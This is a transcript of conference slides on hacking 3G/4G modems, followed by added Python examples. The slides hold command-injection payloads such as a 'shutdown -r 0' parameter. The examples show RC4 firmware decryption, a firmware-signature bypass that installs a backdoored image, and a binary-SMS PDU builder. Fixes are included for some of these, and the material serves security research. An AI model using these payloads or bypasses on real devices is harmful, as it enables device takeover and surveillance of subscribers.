How to build Big Brother

  • Published on
    13-Apr-2017


Transcript

How to build Big Brother
Tim Yunusov, @a66at

How to build Big Brother
With blackjack and hackers
With 3G modems and hackers
Tim Yunusov, @a66at

About me
  • Tim Yunusov
  • Senior Expert, Application Security, Positive Technologies
  • https://uk.linkedin.com/in/tyunusov
  • tyunusov@ptsecurity.com
  • @a66at

When/Who/Where/And why???
  • 2014-2015
  • root via SMS
  • SCADA StrangeLove, https://youtu.be/T9AFFIVpCa8
  • Russia and the whole world
  • 'Cause nobody cares (((

Boring stats
  • >10 (8 different) 3G/4G modems/routers
  • 75% vulnerable to RCE / firmware modification
  • 60% of the RCEs are 0days

Boring stats
  • ~60 000 devices / 1M / Telco
  • 5 000 devices / 1W / SecurityLab
  • 100% vulnerable to RCE / firmware modification

How
  • Identification
  • Code injection
  • Data interception
  • SIM cloning / GSM attacks
  • Host infection
  • APT

Identification
  • WHOIS
  • Fingerprinting
  • Public databases

Fingerprinting
  • mini_httpd/1.19 19dec2003
  • /html/index.html

Code injection
  • Public exploits + old FW
  • Blackbox
  • FW access + FW RE + IDA
  • FW modification + arbitrary upload

Code injection (blackbox)
  • ?action=ping || shutdown -r 0 ||
  • ?date=;ping%20blahblah.com;%20

Code injection: FW access + FW RE + web disassembly
  • Greetings: Kirill Nesterov, Dmitry Sklyarov

Code injection: FW access + FW RE + #USETHEFORCE

Code injection: FW modification + arbitrary upload
  • Integrity attacks
  • Remote uploading (CSRF/XSS)
  • Local upload (diag mode)

Integrity attacks
  • FW encrypted via RC4
  • RSA digital signature + SHA1

FW encrypted via RC4: FAIL
  • Constant keystream: FAIL
  • Part1 XOR Part2: FAIL
  • FW1 XOR FW2: FAIL
  • Lots of known plaintext (CDROM): FAIL

RSA digital signature + SHA1
  • AR archive (!<arch>) holding the FW files
  • pkginfo: sign = RSA(SHA1(FW[0..7742526]))

RSA digital signature + SHA1: FAIL
  • ar --add data.tar.gz
  • ar -v: data.tar.gz, sign, pkginfo, data.tar.gz
  • The signature covers only FW[0..7742526], so a member appended after that range is never hashed and the package still verifies.

FW uploading via CSRF
  • http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html

FW uploading via XSS
  • HUAWEI PSIRT 436642 (2015-05-29)
  • http://www1.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-436642.htm

Data interception
  • Cell ID
  • Wi-Fi
  • SMS
  • HTTP
  • SSL

Data interception: Cell ID
  • Cell ID + http://opencellid.org/
  • RCE
  • XSS

Data interception: Wi-Fi

Data interception: SMS

Data interception: HTTP
  • ARP spoofing
  • DNS spoofing

Data interception: SSL
  • Host RCE

SIM cloning + GSM attacks
  • GEO(!) + IMSI = Fake BTS + Binary SMS
  • OSMO + radio dump + Kraken
  • https://media.blackhat.com/us-13/us-13-nohl-rooting-sim-cards-slides.pdf

SIM cloning + GSM attacks
  • #USETHEFORCE
  • Diag mode
  • Send AT commands: AT+CMGF=0

Host infection
  • BadUSB
  • Fake diagnostic tools / CDROM
  • HTML injection + 0day
  • Even real diagnostic tools =))

Host infection
  • Drive-by download
  • CD-ROM
  • HTML injection + 0day
  • Kudos to @cyberpunkych
  • Lots of other stuff at http://yota.hlsec.ru

APT
  • Subscribers attack subscribers
  • LISTEN 0.0.0.0:80
  • Firewalls

Resume (summary)

KUDOS
  • @cyberpunkych
  • @GIFTSUNGIVEN
  • @SCADASL
  • D. Sklyarov
  • K. Nesterov

Write me ;-)
  • Tim Yunusov
  • https://uk.linkedin.com/in/tyunusov
  • tyunusov@ptsecurity.com
  • @a66at
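The two blackbox payloads on the "Code injection" slide (`?action=ping || shutdown -r 0 ||` and `?date=;ping%20blahblah.com;%20`) work because a request parameter is pasted into a shell command string. The following is an added example, not code from the talk or from any vendor firmware: it models that CGI pattern in Python, shows the command line each payload produces, and puts the hardened handler next to it. The query strings, the `192.168.8.1` target and the `host` parameter name are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed query strings in the shape the slide shows (not captured traffic).
QUERY_ACTION = "action=ping || shutdown -r 0 ||"
QUERY_DATE = "date=;ping%20blahblah.com;%20"


def parse_query(query):
    """Split a raw query string into a dict. Only '&' separates pairs, so a ';'
    inside a value survives exactly as the modem's CGI would receive it."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def vulnerable_shell_line(query, param, template):
    """The bug behind the slide: the parameter is pasted into a command string
    that the CGI would hand to system()/popen(). Returned here, not executed.

    With template "{} -c 4 192.168.8.1" the first payload yields
    "ping || shutdown -r 0 || -c 4 192.168.8.1": `ping` without arguments exits
    non-zero, so `shutdown -r 0` runs, and the trailing `||` turns whatever the
    template appends into a harmless never-reached branch."""
    value = parse_query(query).get(param, "")
    return template.format(value)


# Allow-list for a ping target: hostname labels or an IPv4 literal. Shell
# metacharacters (space ; | & $ ` " ' newline) cannot match at all.
_HOST_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def safe_ping_argv(query, param="host"):
    """Hardened handler: validate against the allow-list, then build an argv
    list for subprocess.run(argv) so no shell ever parses the value."""
    value = parse_query(query).get(param, "")
    if not _HOST_RE.fullmatch(value):
        raise ValueError("rejected ping target: %r" % value)
    return ["ping", "-c", "4", value]


def accepts_target(query, param="host"):
    """True if the hardened handler would run a ping for this query."""
    try:
        safe_ping_argv(query, param)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(vulnerable_shell_line(QUERY_ACTION, "action", "{} -c 4 192.168.8.1"))
    print(vulnerable_shell_line(QUERY_DATE, "date", "date -s {}"))
    print(safe_ping_argv("host=8.8.8.8"))
    print(accepts_target("host=" + QUERY_DATE.split("=", 1)[1]))
```

Note that the fix is the argv list, not the regex alone: even a validated value should never reach `sh -c`, and the regex is there so the diagnostic page cannot be abused to scan arbitrary strings either.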
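The "FW encrypted via RC4" slide lists four ways the encryption fails: a constant keystream, Part1 XOR Part2, FW1 XOR FW2, and lots of known plaintext (the driver CD image). All four are one weakness, a stream cipher keyed identically for every image and every part, and the following added example (mine, not the talk's material and not any vendor's updater) shows it on constructed stand-ins. The RC4 key, the two "firmware" byte strings and the shared "CD001" region are all hypothetical.

```python
def rc4(key, data):
    """Plain RC4: key-scheduling, then one keystream byte XORed per data byte."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


# Hypothetical fixed key baked into the updater. Every image (and every part of
# an image) is encrypted from keystream byte 0, so the keystream never changes.
FIXED_KEY = b"hypothetical-vendor-rc4-key"

# Constructed stand-ins for two releases: versioned kernel/rootfs bytes followed
# by the driver CD image that is identical in both (the "lot of plaintext").
SHARED_ISO = b"CD001 driver CD image, identical in every release " * 4
PT_OLD = b"FW 1.0 kernel+rootfs " * 8 + SHARED_ISO
PT_NEW = b"FW 2.0 kernel+rootfs " * 8 + SHARED_ISO
ENC_OLD = rc4(FIXED_KEY, PT_OLD)
ENC_NEW = rc4(FIXED_KEY, PT_NEW)


def zero_fraction(blob):
    return blob.count(0) / len(blob)


def shares_keystream(enc_a, enc_b, threshold=0.2):
    """The FW1 XOR FW2 check: under one keystream, enc_a XOR enc_b equals
    pt_a XOR pt_b, which is zero wherever the two images share bytes.
    Independent keystreams give roughly 1/256 zeros."""
    return zero_fraction(xor(enc_a, enc_b)) > threshold


def recover_keystream(known_enc, known_plain):
    """Known plaintext XOR its ciphertext is the keystream for those offsets."""
    return xor(known_enc, known_plain)


def decrypt_with_known_plaintext(target_enc, known_enc, known_plain):
    """Apply a keystream recovered from one image to another image encrypted
    under the same key (covers the offsets the known plaintext spans)."""
    return xor(target_enc, recover_keystream(known_enc, known_plain))


def encrypt_parts(key, parts):
    """The Part1 XOR Part2 case: each part encrypted separately with the same
    key, so the keystream restarts at byte 0 for every part."""
    return [rc4(key, part) for part in parts]


if __name__ == "__main__":
    print("FW1 XOR FW2 == PT1 XOR PT2:", xor(ENC_OLD, ENC_NEW) == xor(PT_OLD, PT_NEW))
    print("zero fraction, same key:", zero_fraction(xor(ENC_OLD, ENC_NEW)))
    print("zero fraction, other key:", zero_fraction(xor(ENC_OLD, rc4(b"other", PT_NEW))))
    print(decrypt_with_known_plaintext(ENC_NEW, ENC_OLD, PT_OLD)[:20])
    rootfs, iso = encrypt_parts(FIXED_KEY, [b"FW 2.0 kernel+rootfs " * 8, SHARED_ISO])
    print(decrypt_with_known_plaintext(rootfs, iso, SHARED_ISO)[:20])
```

The last two lines of the main block are the two attacks the slide hints at: an old image whose plaintext you already have decrypts the new one outright, and when parts restart the keystream, the CD image you can read from the modem's virtual CD-ROM decrypts the rootfs part sitting next to it.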
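The "RSA digital signature + SHA1" slides show the package as an ar archive whose signature covers `FW[0..7742526]` only, and the `ar -v` listing after `ar --add data.tar.gz` shows a second `data.tar.gz` member behind `sign` and `pkginfo`. The following added example (not the talk's code and not any vendor's installer) builds such an archive with a minimal ar(1) writer, verifies it the way the slide describes, appends a member, and shows the check still passing; a strict verifier follows. An HMAC-SHA1 under a hypothetical key stands in for RSA signing, because the bypass depends only on which bytes are hashed, and the member contents are constructed.

```python
import hashlib
import hmac
import re

AR_MAGIC = b"!<arch>\n"
# Stand-in for the vendor's RSA private key: HMAC-SHA1 here, since what matters
# for the bypass is the byte range the signature covers, not the algorithm.
VENDOR_KEY = b"hypothetical-vendor-signing-key"


def ar_member(name, data):
    """One ar(1) member: 60-byte ASCII header, data, padded to an even length."""
    header = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
              + "100644".ljust(8) + str(len(data)).ljust(10)).encode() + b"`\n"
    return header + data + (b"\n" if len(data) % 2 else b"")


def ar_members(blob):
    """Yield (name, offset, data) for every member in file order, like `ar -v`."""
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        name = header[:16].decode().rstrip()
        size = int(header[48:58].decode())
        yield name, pos, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)


def sign_range(blob, n):
    """sign = RSA(SHA1(FW[0..n])) in the slide's notation, with the HMAC stand-in."""
    return hmac.new(VENDOR_KEY, blob[:n], hashlib.sha1).digest()


def covered_length(fw):
    """Read n out of pkginfo's "sign=RSA(SHA1(FW[0..n]))" line."""
    members = {name: data for name, _, data in ar_members(fw)}
    return int(re.search(rb"FW\[0\.\.(\d+)\]", members["pkginfo"]).group(1))


def build_signed_package(payload):
    """Vendor side: data.tar.gz first, then sign and pkginfo, the order `ar -v` showed."""
    fw = AR_MAGIC + ar_member("data.tar.gz", payload)
    n = len(fw)                       # the signed range stops at the end of data.tar.gz
    fw += ar_member("sign", sign_range(fw, n))
    fw += ar_member("pkginfo", b"sign=RSA(SHA1(FW[0..%d]))\n" % n)
    return fw


def append_member(fw, name, data):
    """What a quick append (`ar q` in GNU ar; the slide writes `ar --add`) does."""
    return fw + ar_member(name, data)


def extracted_payload(fw):
    """An installer that extracts members in order ends up with the LAST data.tar.gz."""
    payload = None
    for name, _, data in ar_members(fw):
        if name == "data.tar.gz":
            payload = data
    return payload


def verify_as_shipped(fw):
    """The check as the slide describes it: only FW[0..n] is hashed."""
    members = {name: data for name, _, data in ar_members(fw)}
    return hmac.compare_digest(members["sign"], sign_range(fw, covered_length(fw)))


def verify_strict(fw):
    """Fix: same signature, but every member other than sign/pkginfo must lie
    entirely inside the signed range, and no member name may repeat."""
    seen = {}
    for name, offset, data in ar_members(fw):
        if name in seen:
            return False
        seen[name] = (offset, data)
    n = covered_length(fw)
    if not hmac.compare_digest(seen["sign"][1], sign_range(fw, n)):
        return False
    return all(offset + 60 + len(data) <= n
               for name, (offset, data) in seen.items()
               if name not in ("sign", "pkginfo"))


if __name__ == "__main__":
    pkg = build_signed_package(b"genuine rootfs tarball")
    evil = append_member(pkg, "data.tar.gz", b"backdoored rootfs tarball")
    print([name for name, _, _ in ar_members(evil)])
    print("as shipped:", verify_as_shipped(evil), "strict:", verify_strict(evil))
    print("installer would use:", extracted_payload(evil))
```

The strict verifier rejects both the duplicated `data.tar.gz` and any extra member with a new name, since neither lies inside the signed range; a cleaner design signs the whole archive minus the signature member itself, so there is no unsigned tail to append to.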
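The "SIM cloning + GSM attacks" slides stop at `AT+CMGF=0`; that command switches the modem from text mode to PDU mode, which is what sending the binary SMS mentioned on the previous slide requires. The following added example (mine, not from the talk) builds an SMS-SUBMIT PDU per 3GPP TS 23.040 with 8-bit user data and an optional port-addressing header, and returns the AT command sequence that ships it. The destination number, the payload and the port are constructed; the default PID/DCS (0x00/0x04) mean plain 8-bit data, while (U)SIM data download as covered in the linked Nohl slides uses PID 0x7F and DCS 0xF6.

```python
def encode_number(number):
    """TP-DA: digit count, type-of-address, then digits as swapped semi-octets (F pad)."""
    digits = number.lstrip("+")
    toa = 0x91 if number.startswith("+") else 0x81   # international / unknown
    padded = digits + "F" if len(digits) % 2 else digits
    swapped = "".join(padded[i + 1] + padded[i] for i in range(0, len(padded), 2))
    return bytes([len(digits), toa]) + bytes.fromhex(swapped)


def sms_submit_pdu(dest, payload, dest_port=None, src_port=None, pid=0x00, dcs=0x04):
    """SMS-SUBMIT TPDU carrying 8-bit binary user data, with an optional
    application-port UDH (IEI 0x05, 16-bit ports). SCA=00 means "use the
    SMSC stored on the SIM". pid=0x7F, dcs=0xF6 would address the (U)SIM."""
    udh = b""
    if dest_port is not None:
        src = dest_port if src_port is None else src_port
        udh = bytes([0x06, 0x05, 0x04]) + dest_port.to_bytes(2, "big") + src.to_bytes(2, "big")
    user_data = udh + payload
    if len(user_data) > 140:
        raise ValueError("8-bit user data is limited to 140 octets")
    first_octet = 0x01 | (0x40 if udh else 0x00)   # MTI=SMS-SUBMIT, UDHI if header, no VP
    return (bytes([0x00, first_octet, 0x00])         # SCA, first octet, message reference
            + encode_number(dest)
            + bytes([pid, dcs, len(user_data)])
            + user_data)


def at_cmgs_commands(pdu):
    """Lines for the modem: select PDU mode, announce the TPDU length (PDU
    bytes minus the single SCA octet), then the hex PDU terminated by Ctrl-Z."""
    return ["AT+CMGF=0", "AT+CMGS=%d" % (len(pdu) - 1), pdu.hex().upper() + "\x1a"]


if __name__ == "__main__":
    # Constructed: hypothetical number, 3-byte payload, WAP-push port 2948 (0x0B84).
    pdu = sms_submit_pdu("+79161234567", b"\x01\x02\x03", dest_port=2948)
    for line in at_cmgs_commands(pdu):
        print(repr(line))
```

In diag mode the same lines can be written straight to the modem's AT port, which is why a host-side command injection on the web interface turns into SMS sending on the subscriber's behalf.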